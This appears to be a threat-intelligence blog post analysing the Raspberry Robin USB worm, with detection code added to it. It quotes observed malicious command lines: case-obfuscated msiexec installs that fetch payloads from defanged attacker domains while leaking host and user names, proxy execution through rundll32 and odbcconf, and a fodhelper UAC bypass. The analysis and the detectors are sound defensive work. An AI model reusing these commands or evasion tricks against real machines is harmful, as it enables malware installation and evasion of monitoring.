Monday, January 16, 2023

Raspberry Robin: Extremely Evasive Worm Spreads over External Disks


During our threat hunting exercises in recent months, we've started to observe a distinguishing pattern of msiexec.exe usage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered malware called Raspberry Robin. The RedCanary Research Team first coined the name for this malware in their blog post, and Sekoia published a Flash Report about the activity under the name of QNAP Worm. Both articles offer great analysis of the malware's behavior. Our findings support and enrich prior research on the topic.

Execution Chain

Raspberry Robin is a worm that spreads over an external drive. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

Picture 1: Execution chain of Raspberry Robin

Let's walk through the steps of the kill chain to see how this malware functions.

Delivery and Exploitation

Raspberry Robin is delivered through infected external disks. Once attached, cmd.exe tries to execute commands from a file within that disk. This file is either a .lnk file or a file with a specific naming pattern. Files with this pattern exhibit a 2 to 5 character name with a usually obscure extension, including .swy, .chk, .ico, .usb, .xml, and .cfg. Also, the attacker uses an excessive amount of whitespace/non-printable characters and changing letter case to avoid string matching detection techniques. Example command lines include:

  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /R C:\WINDOWS\system32\cmd.exe<Gne.Swy
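Because the padding and mixed case defeat literal string matching, a detector has to normalize the command line before testing it. The following is an added example, not code from the original post: it assumes the redacted padding is made of Unicode control, format or separator characters, and the sample lines and the disk name "USB Drive" are constructed.

```python
import re
import unicodedata

# Extensions the article lists for the short-named delivery file ("including",
# so the list is not exhaustive).
EXTS = "swy|chk|ico|usb|xml|cfg"
SHORT_NAME = re.compile(rf"[a-z0-9]{{2,5}}\.(?:{EXTS})")
LNK_FILE = re.compile(r".+\.lnk(?::\w+)?")   # optional ":xx" suffix as in ".LNk:qk"
# Outer cmd with /R or /C, then an inner cmd reading its commands from a file.
REDIRECT = re.compile(
    r"cmd(?:\.exe)?\s(?:/\w\s?)*/[rc]\s?"
    r"(?:[a-z]:\\(?:[^\\<]+\\)*)?cmd(?:\.exe)?\s?<(?P<file>[^<>|]+)$"
)

def normalize(cmdline: str) -> str:
    """Turn control/format/separator characters into spaces, collapse, case-fold."""
    spaced = "".join(
        " " if unicodedata.category(ch)[0] in "CZ" else ch for ch in cmdline
    )
    return re.sub(r" +", " ", spaced).strip().casefold()

def classify(cmdline: str):
    """Return 'short-name', 'lnk', 'redirect-only' or None for a command line."""
    m = REDIRECT.search(normalize(cmdline))
    if not m:
        return None
    name = m.group("file").strip()
    if SHORT_NAME.fullmatch(name):
        return "short-name"
    if LNK_FILE.fullmatch(name):
        return "lnk"
    return "redirect-only"

CMD = r"C:\Windows\System32\cmd.exe"
# Constructed samples; the padding characters stand in for the redacted ones.
SAMPLES = [
    CMD + " \t\x0b\u00a0  " + "/RCmD<qjM.chK",
    CMD + "\t\t \x1f" + "/rcMD<USB Drive.LNk:qk",
    CMD + "  " + "/R " + CMD.upper() + "<Gne.Swy",
    CMD + " /c type notes.txt",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s), "<-", repr(s))
```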

File sample for delivery can be found at this URL:

Next, we observe explorer.exe running with an obscure command line argument, spawned by a previous instance of cmd.exe. This obscure argument seems to take the name of an infected external drive or .lnk file that was previously executed. Some of the samples had values including USB, USB DISK, or USB Drive, while some other samples had more specific names. On every instance of explorer.exe we see that the adversary is changing the letter case to avoid detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK

Installation

After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -q or /q together with the standard installation parameter to operate quietly. Once again, mixed-case letters are used to bypass detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you can see above, URLs used for payload download have a specific pattern. Domains use 2 to 4 character names with obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths have a single directory with a random string 11 characters long, followed by the hostname and the username of the victim. On network telemetry, we also observed the Windows Installer user agent due to the usage of msiexec.exe. To detect Raspberry Robin through its URL pattern, use this regex:
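As an added example (not the regex from the original post), the following matcher is written from the description above and the sample command lines: a quiet msiexec install from an http URL with a 2 to 4 character domain name, port 8080, one 11-character directory, then hostname and username joined by `=` or `?`. The domains, host names and user names in the samples are constructed.

```python
import re

# Written from the article's description of the download URL. The character set
# of the 11-character segment is not stated, so any non-slash characters pass.
URL = re.compile(
    r"http://(?P<domain>[a-z0-9]{2,4}\.[a-z]{2,})"      # 2-4 char name + TLD
    r":8080/(?P<token>[^/\s]{11})/"                      # single 11-char directory
    r"(?P<host>[^/=?\s]+)[=?](?P<user>\S+)",             # host, '=' or '?', user
    re.IGNORECASE,
)
MSIEXEC = re.compile(r"\bmsiexec(?:\.exe)?\b", re.IGNORECASE)
QUIET = re.compile(r"(?:^|\s)[-/]q", re.IGNORECASE)           # -q or /q
INSTALL = re.compile(r"[-/]i\s*(?=http://)", re.IGNORECASE)   # -i or /i before URL

def match_download(cmdline: str):
    """Return URL fields if cmdline is a quiet msiexec install from such a URL."""
    line = cmdline.replace("[.]", ".")        # accept defanged input
    if not (MSIEXEC.search(line) and QUIET.search(line) and INSTALL.search(line)):
        return None
    m = URL.search(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["domain"] = fields["domain"].lower()
    return fields

# Constructed command lines (defanged, hypothetical hosts and users).
SAMPLES = [
    "mSIexeC -Q -IhTtP://ab1[.]example:8080/a1B2c3D4e5F/DESKTOP-01=alice",
    "MSieXEC -Q-ihtTp://zz[.]example:8080/QwErTyUiOp1/WS7?bob",
    r"msiexec /i C:\Temp\setup.msi /qn",
    "msiexec /q /i https://downloads.example.com/app/setup.msi",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(match_download(s), "<-", s)
```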


If we look up the WHOIS information for the given domains, we see domain registration dates going as far back as February 2015. We also see an increase in registered domains starting from September 2021, which aligns with initial observations of Raspberry Robin by our peers.

WHOIS Creation Date    Count
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Table 1: Distribution of domain creation dates over time


Associated domains have SSL certificates with the subject alternative name of, which points to the underlying QNAP cloud infra. Also, their URL scan results return login pages to the QTS service of QNAP:

Picture 2: QNAP QTS login page from associated domains

Once the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or control.exe. These binaries are used to execute the payload stored in C:\ProgramData\[3 chars]\

  • C:\WINDOWS\system32\rundll32.exe shell32.dll ShellExec_RunDLL C:\WINDOWS\syswow64\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:\ProgramData\Azu\wnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:\Windows\system32\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:\Windows\syswow64\odbcconf.exe -s -C -a {regsvr C:\ProgramData\Tvb\zhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:\WINDOWS\syswow64\odbcconf -E /c /C -a {regsvr C:\ProgramData\Euo\ikdvnbb.xml.}
  • C:\WINDOWS\system32\rundll32.exe SHELL32,ShellExec_RunDLL C:\WINDOWS\syswow64\CONTROL.EXE C:\ProgramData\Lzm\qkuiht.lkg.

It is followed by the execution of fodhelper.exe, which has the auto elevated bit set to true. It is often leveraged by adversaries in order to bypass User Account Control and execute additional commands with escalated privileges [3]. To monitor suspicious executions of fodhelper.exe, we suggest monitoring its instances without any command line arguments.

Command and Control

Raspberry Robin sets up its C2 channel through the additional execution of system binaries without any command line argument, which is quite uncommon. That likely points to process injection given elevated privileges in previous steps of execution. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.
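The monitoring suggested for fodhelper.exe and the argument-less system binaries above can be expressed as one filter over process-creation events. This is an added example, not code from the original post; the event field names, process IDs and command lines are constructed, and it assumes the image path is either quoted or free of spaces (true for System32 and SysWOW64).

```python
import ntpath

# Binaries the article names: fodhelper.exe (UAC bypass step) and the three
# hosts used to set up the TOR-based C2 channel.
WATCHED = {"fodhelper.exe", "dllhost.exe", "rundll32.exe", "regsvr32.exe"}

def split_image(cmdline: str):
    """Split a Windows command line into (image, remaining arguments)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                 # unbalanced quote: whole string is the image
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    parts = s.split(None, 1) or [""]
    return parts[0], parts[1].strip() if len(parts) > 1 else ""

def bare_executions(events):
    """Return events where a watched binary ran with no arguments at all."""
    hits = []
    for ev in events:
        image, rest = split_image(ev["cmdline"])
        name = ntpath.basename(image).lower()
        if not name.endswith(".exe"):
            name += ".exe"
        if name in WATCHED and not rest:
            hits.append(ev)
    return hits

# Constructed process-creation events (hypothetical field names and values).
EVENTS = [
    {"pid": 4100, "cmdline": r'"C:\Windows\System32\fodhelper.exe"'},
    {"pid": 4212, "cmdline": r"C:\Windows\SysWOW64\rundll32.exe   "},
    {"pid": 4300, "cmdline": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"pid": 4388, "cmdline": "regsvr32"},
    {"pid": 4410, "cmdline": r"C:\Windows\System32\dllhost.exe "
                             "/Processid:{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for ev in bare_executions(EVENTS):
        print(ev["pid"], ev["cmdline"])
```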

Detection through Global Threat Alerts

In Cisco Global Threat Alerts, available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track this activity under the Raspberry Robin threat object. Picture 3 shows a detection sample of Raspberry Robin:

Picture 3: Raspberry Robin detection sample in Cisco Global Threat Alerts


Raspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and abuse of compromised QNAP accounts. Although we have similar intelligence gaps (how it infects external disks, what are its actions on objective) like our peers, we are continuously observing its activities.

Indicators of Compromise



  1. Raspberry Robin gets the worm early –
  2. QNAP worm: who benefits from crime? – https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/



